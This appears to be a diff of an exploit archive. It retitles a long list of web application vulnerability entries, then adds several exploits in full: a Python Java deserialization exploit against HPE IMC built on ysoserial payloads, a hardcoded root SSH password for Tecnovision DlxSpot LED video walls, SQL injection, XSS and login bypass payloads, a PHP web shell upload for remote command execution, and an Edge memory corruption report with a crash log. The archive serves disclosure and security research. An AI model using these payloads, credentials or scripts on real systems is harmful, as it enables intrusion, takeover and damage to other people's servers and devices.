Maintain 3.0.0-RC2 - 'Example6.php' Remote File Inclusion

Zorum 3.5 - DBProperty.php Remote File Inclusion
Zorum 3.5 - 'DBProperty.php' Remote File Inclusion

PHPMyConferences 8.0.2 - Init.php Remote File Inclusion
PHPMyConferences 8.0.2 - 'Init.php' Remote File Inclusion

PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion
PHPTreeView 1.0 - 'TreeViewClass.php' Remote File Inclusion

PLS-Bannieres 1.21 - Bannieres.php Remote File Inclusion
PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion

The Search Engine Project 0.942 - Configfunction.php Remote File Inclusion
The Search Engine Project 0.942 - 'Configfunction.php' Remote File Inclusion

KnowledgeBuilder 2.2 - visEdit_Control.Class.php Remote File Inclusion
KnowledgeBuilder 2.2 - 'visEdit_Control.Class.php' Remote File Inclusion

NewP News Publishing System 1.0 - Class.Database.php Remote File Inclusion
NewP News Publishing System 1.0 - 'Class.Database.php' Remote File Inclusion

Advanced Guestbook 2.3.1 - admin.php Remote File Inclusion
Advanced Guestbook 2.3.1 - 'admin.php' Remote File Inclusion

@cid Stats 2.3 - Install.php3 Remote File Inclusion
@cid Stats 2.3 - 'Install.php3' Remote File Inclusion

PHPMyChat 0.14/0.15 - Languages.Lib.php Local File Inclusion
PHPMyChat 0.14/0.15 - 'Languages.Lib.php' Local File Inclusion

PHPdebug 1.1 - Debug_test.php Remote File Inclusion
PHPdebug 1.1 - 'Debug_test.php' Remote File Inclusion

eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion
eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion
Easy Banner Pro 2.8 - info.php Remote File Inclusion
Edit-X - Edit_Address.php Remote File Inclusion
Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion
Edit-X - 'Edit_Address.php' Remote File Inclusion

OpenEMR 2.8.2 - Import_XML.php Remote File Inclusion
OpenEMR 2.8.2 - 'Import_XML.php' Remote File Inclusion

PHPProbid 5.24 - Lang.php Remote File Inclusion
PHPProbid 5.24 - 'Lang.php' Remote File Inclusion

MySQLNewsEngine - Affichearticles.php3 Remote File Inclusion
MySQLNewsEngine - 'Affichearticles.php3' Remote File Inclusion

Meganoide's News 1.1.1 - Include.php Remote File Inclusion
Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion

Shop Kit Plus - StyleCSS.php Local File Inclusion
Shop Kit Plus - 'StyleCSS.php' Local File Inclusion
Pickle 0.3 - download.php Local File Inclusion
Active Calendar 1.2 - showcode.php Local File Inclusion
Pickle 0.3 - 'download.php' Local File Inclusion
Active Calendar 1.2 - 'showcode.php' Local File Inclusion

JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion
JCCorp URLShrink Free 1.3.1 - 'CreateURL.php' Remote File Inclusion

Weekly Drawing Contest 0.0.1 - Check_Vote.php Local File Inclusion
Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion

WordPress < 2.1.2 - PHP_Self Cross-Site Scripting
WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting

Satel Lite - Satellite.php Local File Inclusion
Satel Lite - 'Satellite.php' Local File Inclusion

eCardMAX HotEditor 4.0 - Keyboard.php Local File Inclusion
eCardMAX HotEditor 4.0 - 'Keyboard.php' Local File Inclusion

MyNews 4.2.2 - Week_Events.php Remote File Inclusion
MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion
Web Service Deluxe News Manager 1.0.1 Deluxe - footer.php Local File Inclusion
Actionpoll 1.1 - Actionpoll.php Remote File Inclusion
Web Service Deluxe News Manager 1.0.1 Deluxe - 'footer.php' Local File Inclusion
Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion

Fully Modded PHPBB2 - phpbb_root_path Remote File Inclusion
Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion

PHP Turbulence 0.0.1 - Turbulence.php Remote File Inclusion
PHP Turbulence 0.0.1 - 'Turbulence.php' Remote File Inclusion
Allfaclassifieds 6.04 - Level2.php Remote File Inclusion
PHPMyBibli 1.32 - Init.Inc.php Remote File Inclusion
Allfaclassifieds 6.04 - 'Level2.php' Remote File Inclusion
PHPMyBibli 1.32 - 'Init.Inc.php' Remote File Inclusion

ACVSWS - Transport.php Remote File Inclusion
ACVSWS - 'Transport.php' Remote File Inclusion

Lms 1.5.x - RTMessageAdd.php Remote File Inclusion
Lms 1.5.x - 'RTMessageAdd.php' Remote File Inclusion
MyNewsGroups 0.6 - Include.php Remote File Inclusion
PHPMyTGP 1.4 - AddVIP.php Remote File Inclusion
MyNewsGroups 0.6 - 'Include.php' Remote File Inclusion
PHPMyTGP 1.4 - 'AddVIP.php' Remote File Inclusion

Comus 2.0 - Accept.php Remote File Inclusion
Comus 2.0 - 'Accept.php' Remote File Inclusion
HTMLEditBox 2.2 - config.php Remote File Inclusion
DynaTracker 1.5.1 - includes_handler.php base_path Remote File Inclusion
DynaTracker 1.5.1 - action.php base_path Remote File Inclusion
HTMLEditBox 2.2 - 'config.php' Remote File Inclusion
DynaTracker 1.5.1 - 'includes_handler.php' 'base_path' Remote File Inclusion
DynaTracker 1.5.1 - 'action.php' 'base_path' Remote File Inclusion

Doruk100Net - Info.php Remote File Inclusion
Doruk100Net - 'Info.php' Remote File Inclusion

PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion
PHPSecurityAdmin 4.0.2 - 'Logout.php' Remote File Inclusion

PHP Content Architect 0.9 pre 1.2 - MFA_Theme.php Remote File Inclusion
PHP Content Architect 0.9 pre 1.2 - 'MFA_Theme.php' Remote File Inclusion

PHPHostBot 1.05 - Authorize.php Remote File Inclusion
PHPHostBot 1.05 - 'Authorize.php' Remote File Inclusion

PHMe 0.0.2 - Function_List.php Local File Inclusion
PHMe 0.0.2 - 'Function_List.php' Local File Inclusion
VietPHP - _functions.php dirpath Parameter Remote File Inclusion
VietPHP - admin/index.php language Parameter Remote File Inclusion
VietPHP - '_functions.php' dirpath Parameter Remote File Inclusion
VietPHP - 'admin/index.php' language Parameter Remote File Inclusion

Coppermine Photo Gallery 1.3/1.4 - YABBSE.INC.php Remote File Inclusion
Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File Inclusion

Shoutbox 1.0 - Shoutbox.php Remote File Inclusion
Shoutbox 1.0 - 'Shoutbox.php' Remote File Inclusion
Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion
Web News 1.1 - news.php config[root_ordner] Parameter Remote File Inclusion
Lib2 PHP Library 0.2 - My_Statistics.php Remote File Inclusion
Web News 1.1 - 'feed.php' 'config[root_ordner]' Parameter Remote File Inclusion
Web News 1.1 - 'news.php' 'config[root_ordner]' Parameter Remote File Inclusion
Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion
Dalai Forum 1.1 - forumreply.php Local File Inclusion
Firesoft - Class_TPL.php Remote File Inclusion
Dalai Forum 1.1 - 'forumreply.php' Local File Inclusion
Firesoft - 'Class_TPL.php' Remote File Inclusion

PHP-Nuke 8.0 - autohtml.php Local File Inclusion
PHP-Nuke 8.0 - 'autohtml.php' Local File Inclusion

Content Builder 0.7.5 - postComment.php Remote File Inclusion
Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion

Jeebles Technology Jeebles Directory 2.9.60 - download.php Local File Inclusion
Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion

PHPbasic basicFramework 1.0 - Includes.php Remote File Inclusion
PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion

Galmeta Post 0.2 - Upload_Config.php Remote File Inclusion
Galmeta Post 0.2 - 'Upload_Config.php' Remote File Inclusion

MyBlog 1.x - Games.php ID Remote File Inclusion
MyBlog 1.x - 'Games.php' 'ID' Remote File Inclusion

PHPMyTourney 2 - tourney/index.php Remote File Inclusion
PHPMyTourney 2 - 'tourney/index.php' Remote File Inclusion
W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - delete_notes.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - delete_user.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - edit_forum.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - mail_users.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - moderate_notes.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - reorder_forums.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'add_user.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'create_forum.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'create_user.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'delete_notes.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'delete_user.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'edit_forum.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'mail_users.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'moderate_notes.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'reorder_forums.php' bn_dir_default Parameter Remote File Inclusion

XOOPS 2.0.18 - modules/system/admin.php fct Parameter Traversal Local File Inclusion
XOOPS 2.0.18 - 'modules/system/admin.php' 'fct' Parameter Traversal Local File Inclusion

Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell
Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Web Shell

C99Shell 1.0 Pre-Release build 16 - 'ch99.php' Cross-Site Scripting
C99Shell 1.0 Pre-Release build 16 (Web Shell) - 'ch99.php' Cross-Site Scripting

C99 Shell - 'c99.php' Authentication Bypass
C99Shell (Web Shell) - 'c99.php' Authentication Bypass

W-Agora 4.2.1 - search.php3 bn Parameter Traversal Local File Inclusion
W-Agora 4.2.1 - 'search.php3' 'bn' Parameter Traversal Local File Inclusion

Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' Remote PHP Code Execution
Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' PHP Remote Code Execution

MySQLDumper 1.24.4 - 'menu.php' Remote PHP Code Execution
MySQLDumper 1.24.4 - 'menu.php' PHP Remote Code Execution

Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution
Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution

Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM
Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection

Nuts CMS - Remote PHP Code Injection / Execution
Nuts CMS - PHP Remote Code Injection / Execution

WordPress Plugin WP Super Cache - Remote PHP Code Execution
WordPress Plugin WP Super Cache - PHP Remote Code Execution

b374k Web Shell 3.2.3/2.8 - Cross-Site Request Forgery / Command Injection
b374k 3.2.3/2.8 (Web Shell) - Cross-Site Request Forgery / Command Injection

Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion
Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion

XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection
XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection

ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials Remote SYSTEM Code Execution
ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials SYSTEM Remote Code Execution

Apache - HTTP OPTIONS Memory Leak
Apache < 2.2.34 / < 2.4.27 - HTTP OPTIONS Memory Leak
Foodspotting Clone 1.0 - SQL Injection
iTech Gigs Script 1.20 - 'cat' Parameter SQL Injection
Tecnovision DLX Spot - Authentication Bypass
Tecnovision DLX Spot - Arbitrary File Upload

platforms/java/remote/42756.py

@@ -0,0 +1,104 @@
+#!/usr/bin/env python
+
+########################################################################################################
+# 
+# HPE/H3C IMC - Java Deserialization Exploit
+#
+# Version 0.1
+#    Tested on Windows Server 2008 R2
+#    Name	HPE/H3C IMC (Intelligent Management Center)	Java 1.8.0_91
+#
+# Author:
+# Raphael Kuhn (Daimler TSS)
+# 
+# Special thanks to:
+# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
+#
+#######################################################################################################
+
+import requests
+import sys
+import os
+import os.path
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+host         = "127.0.0.1:8080"
+payload_file = "payload.bin"
+body        = ""
+
+def printUsage () :
+    print "......................................................................................................................"
+    print "."
+    print ". HPE/H3C - IMC Java Deserialization Exploit"
+    print "."
+    print ". Example 1: -payload-binary"
+    print ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % sys.argv[0]
+    print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
+    print ".     1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) "
+    print ".        java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin"
+    print ".     2. Send request to server"
+    print ".        %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin"  % sys.argv[0]
+    print "."
+    print ". Example 2: -payload-string"
+    print '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % sys.argv[0]
+    print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
+    print ".     1. Send request to server with payload as string (need ysoserial.jar in the same folder)"
+    print '.        %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"'  % sys.argv[0]
+    print "."
+    print "......................................................................................................................"
+
+def loadPayloadFile (_fileName) :
+    print "[+] Load payload file %s" % _fileName
+    payloadFile = open(_fileName, 'rb')
+    payloadFile_read = payloadFile.read()
+    return payloadFile_read
+
+def exploit (_payload) :
+    url = sys.argv[1]
+    url += "/imc/topo/WebDMServlet"
+    print "[+] Sending exploit to %s" % (url) 
+    data = _payload
+    response = requests.post(url, data=data, verify=False)
+    return response
+
+#def showResponse(_response):
+#    r = response
+#    m = r.search(_response)
+#    if (m.find("java.lang.NullPointerException")):
+#        print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
+#    else:
+#        print "[-] ClassCastException not found, exploit failed"
+
+
+if __name__ == "__main__":
+    if len(sys.argv) < 4:
+        printUsage()
+        sys.exit(0)
+    else:
+        print "------------------------------------------"
+        print "- HPE/H3C - IMC Java Deserialization Exploit -"
+        print "------------------------------------------"
+        host = sys.argv[1]
+        print "[*] Connecting to %s" %host
+    if sys.argv[2] == "-payload-binary":
+        payload_file = sys.argv[3]
+        if os.path.isfile(payload_file):
+            payload = loadPayloadFile(payload_file)
+            response = exploit(payload)
+            showResponse(response.content)
+        else:
+            print "[-] Can't load payload file"
+    elif sys.argv[2] == "-payload-string":
+            if os.path.isfile("ysoserial.jar"):
+                sPayload = sys.argv[3]
+                sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin"
+                print "[+] Create payload file (%s) " %sPayload
+                os.system(sPayload)
+                payload = loadPayloadFile(payload_file)
+                response = exploit(payload)
+                print "[+] Response received, exploit finished."
+            else:
+                print "[-] Can't load ysoserial.jar"
+    else:
+        printUsage()

platforms/multiple/remote/42753.txt

@@ -0,0 +1,34 @@
+# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password.
+# Google Dork: "DlxSpot - Player4"
+# Date: 2017-05-14
+# Discoverer: Simon Brannstrom
+# Authors Website: https://unknownpwn.github.io/
+# Vendor Homepage: http://www.tecnovision.com/
+# Software Link: n/a
+# Version: All known versions
+# Tested on: Linux
+# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc.
+# CVE: CVE-2017-12928
+# Linked CVE's: CVE-2017-12929, CVE-2017-12930
+
+# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.
+###############################################################################################################################
+
+Hardcoded password for all dlxspot players, login with the following credentials via SSH
+
+username: dlxuser
+password: tecn0visi0n
+
+Escalate to root with the same password.
+
+TIMELINE:
+2017-05-14 - Discovery of vulnerabilities.
+2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.
+2017-06-01 - No response, tried contacting again through several contact forms on homepage.
+2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.
+2017-08-17 - Three CVE's assigned for the vulnerabilities found.
+2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.
+2017-09-18 - No response, full public disclosure.
+
+  DEDICATED TO MARCUS ASTROM
+FOREVER LOVED - NEVER FORGOTTEN

platforms/php/webapps/42751.txt

@@ -0,0 +1,44 @@
+# Exploit Title: Foodspotting Clone v1.0 - SQL Injection/Reflected XSS
+# Date: 2017-09-13
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.phpscriptsmall.com/product/foodspotting-clone/
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-13
+
+Product & Service Introduction:
+===============================
+Foodspotting Clone allows you to initiate your very own social networking website that similar appearance as Foodspotting and additional food lover websites.
+
+Technical Details & Description:
+================================
+
+Reflected XSS/SQL injection on [resid] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+http://localhost/[path]/restaurant-menu.php?resid=' AND SLEEP(5) AND 'nhSH'='nhSH
+
+Parameter: resid (GET)
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: resid=' AND SLEEP(5) AND 'nhSH'='nhSH
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 14 columns
+    Payload: resid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x435a72445467737074496d6e5a7855726f6e534c4b6469705774427550576c70676d425361626642,0x71767a6271),NULL,NULL,NULL-- aIwp
+
+Reflected XSS:
+
+http://localhost/[path]/restaurant-menu.php?resid=/"><svg/onload=alert(/8bitsec/)>
+==================
+8bitsec - [https://twitter.com/_8bitsec]

platforms/php/webapps/42752.txt

@@ -0,0 +1,37 @@
+# Exploit Title: iTech Gigs Script v1.20 - SQL Injection
+# Date: 2017-09-15
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://itechscripts.com/
+# Software Link: http://itechscripts.com/the-gigs-script/
+# Version: 1.20
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-15
+
+Product & Service Introduction:
+===============================
+Designed to launch an online market place facilitating participation of professionals from diverse walks of life.
+
+Technical Details & Description:
+================================
+
+SQL injection on [cat] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+http://localhost/[path]/browse-category.php?cat=xxxxx' AND 4079=4079 AND 'zpSy'='zpSy
+
+Parameter: cat (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: cat=10c4ca4238a0b923820dcc509a6f75849b' AND 4079=4079 AND 'zpSy'='zpSy
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]

platforms/php/webapps/42754.txt

@@ -0,0 +1,43 @@
+# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL
+Injection
+# Google Dork: "DlxSpot - Player4"
+# Date: 2017-05-14
+# Discoverer: Simon Brannstrom
+# Authors Website: https://unknownpwn.github.io/
+# Vendor Homepage: http://www.tecnovision.com/
+# Software Link: n/a
+# Version: >1.5.10
+# Tested on: Linux
+# About: DlxSpot is the software controlling Tecnovision LED Video Walls
+all over the world, they are used in football arenas, concert halls,
+shopping malls, as roadsigns etc.
+# CVE: CVE-2017-12930
+# Linked CVE's: CVE-2017-12928, CVE-2017-12929
+
+# Visit my github page at
+https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
+for complete takeover of the box, from SQLi to full root access.
+###############################################################################################################################
+
+DlxSpot Player 4 above version 1.5.10 suffers from an SQL injection
+vulnerability in the admin interface login and is exploitable the following
+way:
+
+username:admin
+password:x' or 'x'='x
+
+TIMELINE:
+2017-05-14 - Discovery of vulnerabilities.
+2017-05-15 - Contacted Tecnovision through contact form on manufacturer
+homepage.
+2017-06-01 - No response, tried contacting again through several contact
+forms on homepage.
+2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
+requesting CVE assignment.
+2017-08-17 - Three CVE's assigned for the vulnerabilities found.
+2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
+email in Italian to the company.
+2017-09-18 - No response, full public disclosure.
+
+  DEDICATED TO MARCUS ASTROM
+FOREVER LOVED - NEVER FORGOTTEN

platforms/php/webapps/42755.txt

@@ -0,0 +1,43 @@
+# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload
+to RCE
+# Google Dork: "DlxSpot - Player4"
+# Date: 2017-05-14
+# Discoverer: Simon Brannstrom
+# Authors Website: https://unknownpwn.github.io/
+# Vendor Homepage: http://www.tecnovision.com/
+# Software Link: n/a
+# Version: >1.5.10
+# Tested on: Linux
+# About: DlxSpot is the software controlling Tecnovision LED Video Walls
+all over the world, they are used in football arenas, concert halls,
+shopping malls, as roadsigns etc.
+# CVE: CVE-2017-12929
+# Linked CVE's: CVE-2017-12928, CVE-2017-12930.
+
+# Visit my github page at
+https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
+for complete takeover of the box, from SQLi to root access.
+###############################################################################################################################
+
+Arbitrary File Upload leading to Remote Command Execution:
+
+1. Visit http://host/resource.php and upload PHP shell. For example: <?php
+system($_GET["c"]); ?>
+2. RCE via http://host/resource/source/shell.php?c=id
+3. Output: www-data
+
+TIMELINE:
+2017-05-14 - Discovery of vulnerabilities.
+2017-05-15 - Contacted Tecnovision through contact form on manufacturer
+homepage.
+2017-06-01 - No response, tried contacting again through several contact
+forms on homepage.
+2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
+requesting CVE assignment.
+2017-08-17 - Three CVE's assigned for the vulnerabilities found.
+2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
+email in Italian to the company.
+2017-09-18 - No response, full public disclosure.
+
+  DEDICATED TO MARCUS ASTROM
+FOREVER LOVED - NEVER FORGOTTEN

platforms/windows/dos/42758.txt

@@ -0,0 +1,115 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1309
+
+There is a security issue in Microsoft Edge related to how HTML documents are loaded. If Edge displays a HTML document from a slow HTTP server, it is possible that a part of the document is going to be rendered before the server has finished sending the document. It is also possible that some JavaScript code is going to trigger.
+
+By making DOM modifications before the document had a chance of fully loading, followed by another set of DOM modifications afer the page has been loaded, it is possible to trigger memory corruption that could possibly lead to an exploitable condition.
+
+A debug log is included below. Note that the crash RIP directly preceeds a (CFG-protected) indirect call, which demonstrates the exploitability of the issue.
+
+Since a custom HTTP server is needed to demonstrate the issue, I'm attaching all of the required code. Simply run server.py and point Edge to http://127.0.0.1:8000/
+
+Note: this has been tested on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393)
+
+
+Debug log:
+
+=========================================
+
+(a68.9c0): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
+00007ffa`9d5f15ea 488b01          mov     rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????
+
+0:013> k
+ # Child-SP          RetAddr           Call Site
+00 000000eb`c42f8da0 00007ffa`9d8b243d edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa
+01 000000eb`c42f8dd0 00007ffa`9d8b28e2 edgehtml!Collections::SGrowingArray<TSmartPointer<Tree::ANode,CStrongReferenceTraits> >::DeleteAt+0x89
+02 000000eb`c42f8e00 00007ffa`9d8b0cd7 edgehtml!Undo::UndoNodeList::RemoveNodesCompletelyContained+0x5e
+03 000000eb`c42f8e30 00007ffa`9d8ad79b edgehtml!Undo::WrapUnwrapNodeUndoUnit::RemoveNodesAtOldPosition+0x33
+04 000000eb`c42f8e70 00007ffa`9d5b303d edgehtml!Undo::MoveForestUndoUnit::HandleWrapUnwrap+0x6b
+05 000000eb`c42f8f10 00007ffa`9d8ac629 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa3fd
+06 000000eb`c42f8f60 00007ffa`9d5b3085 edgehtml!Undo::ParentUndoUnit::ApplyScriptedOperationToChildren+0xb5
+07 000000eb`c42f8ff0 00007ffa`9d11035c edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa445
+08 000000eb`c42f9040 00007ffa`9d110125 edgehtml!Undo::UndoManager::ApplyScriptedOperationsToUserUnits+0x11c
+09 000000eb`c42f9130 00007ffa`9d1d6f0d edgehtml!Undo::UndoManager::SubmitUndoUnit+0x125
+0a 000000eb`c42f9170 00007ffa`9dc9c9ae edgehtml!CSelectionManager::CreateAndSubmitSelectionUndoUnit+0x141
+0b 000000eb`c42f9200 00007ffa`9dc90b70 edgehtml!CRemoveFormatBaseCommand::PrivateExec+0xae
+0c 000000eb`c42f92c0 00007ffa`9dc9057a edgehtml!CCommand::Exec+0xe8
+0d 000000eb`c42f9350 00007ffa`9d55e481 edgehtml!CMshtmlEd::Exec+0x17a
+0e 000000eb`c42f93b0 00007ffa`9d39cc34 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xa5841
+0f 000000eb`c42f9470 00007ffa`9d21d6a1 edgehtml!CDoc::ExecHelper+0x5d18
+10 000000eb`c42fb020 00007ffa`9d1dbb57 edgehtml!CDocument::Exec+0x41
+11 000000eb`c42fb070 00007ffa`9d1dba25 edgehtml!CBase::execCommand+0xc7
+12 000000eb`c42fb0f0 00007ffa`9d1db8ac edgehtml!CDocument::execCommand+0x105
+13 000000eb`c42fb2e0 00007ffa`9d498155 edgehtml!CFastDOM::CDocument::Trampoline_execCommand+0x124
+14 000000eb`c42fb3f0 00007ffa`9c930e37 edgehtml!CFastDOM::CDocument::Profiler_execCommand+0x25
+15 000000eb`c42fb420 00007ffa`9c9e9073 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x177
+16 000000eb`c42fb500 00007ffa`9c9596cd chakra!amd64_CallFunction+0x93
+17 000000eb`c42fb560 00007ffa`9c95cec7 chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x15d
+18 000000eb`c42fb600 00007ffa`9c960f52 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xa7
+19 000000eb`c42fb680 00007ffa`9c95f1b2 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x132
+1a 000000eb`c42fb710 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x142
+1b 000000eb`c42fb770 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
+1c 000000eb`c42fbad0 00000284`bf4b0fa2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
+1d 000000eb`c42fbb20 00007ffa`9c9e9073 0x00000284`bf4b0fa2
+1e 000000eb`c42fbb50 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
+1f 000000eb`c42fbba0 00007ffa`9c95abc0 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+20 000000eb`c42fbc00 00007ffa`9c95f65d chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
+21 000000eb`c42fbc50 00007ffa`9c95f217 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
+22 000000eb`c42fbce0 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x1a7
+23 000000eb`c42fbd40 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
+24 000000eb`c42fc090 00000284`bf4b0faa chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
+25 000000eb`c42fc0e0 00007ffa`9c9e9073 0x00000284`bf4b0faa
+26 000000eb`c42fc110 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
+27 000000eb`c42fc160 00007ffa`9c98ce3c chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+28 000000eb`c42fc1c0 00007ffa`9c98c406 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
+29 000000eb`c42fc2b0 00007ffa`9c9ce4d9 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
+2a 000000eb`c42fc320 00007ffa`9c9928a1 chakra!ScriptSite::CallRootFunction+0xb5
+2b 000000eb`c42fc3c0 00007ffa`9c98e45c chakra!ScriptSite::Execute+0x131
+2c 000000eb`c42fc450 00007ffa`9d333b2d chakra!ScriptEngineBase::Execute+0xcc
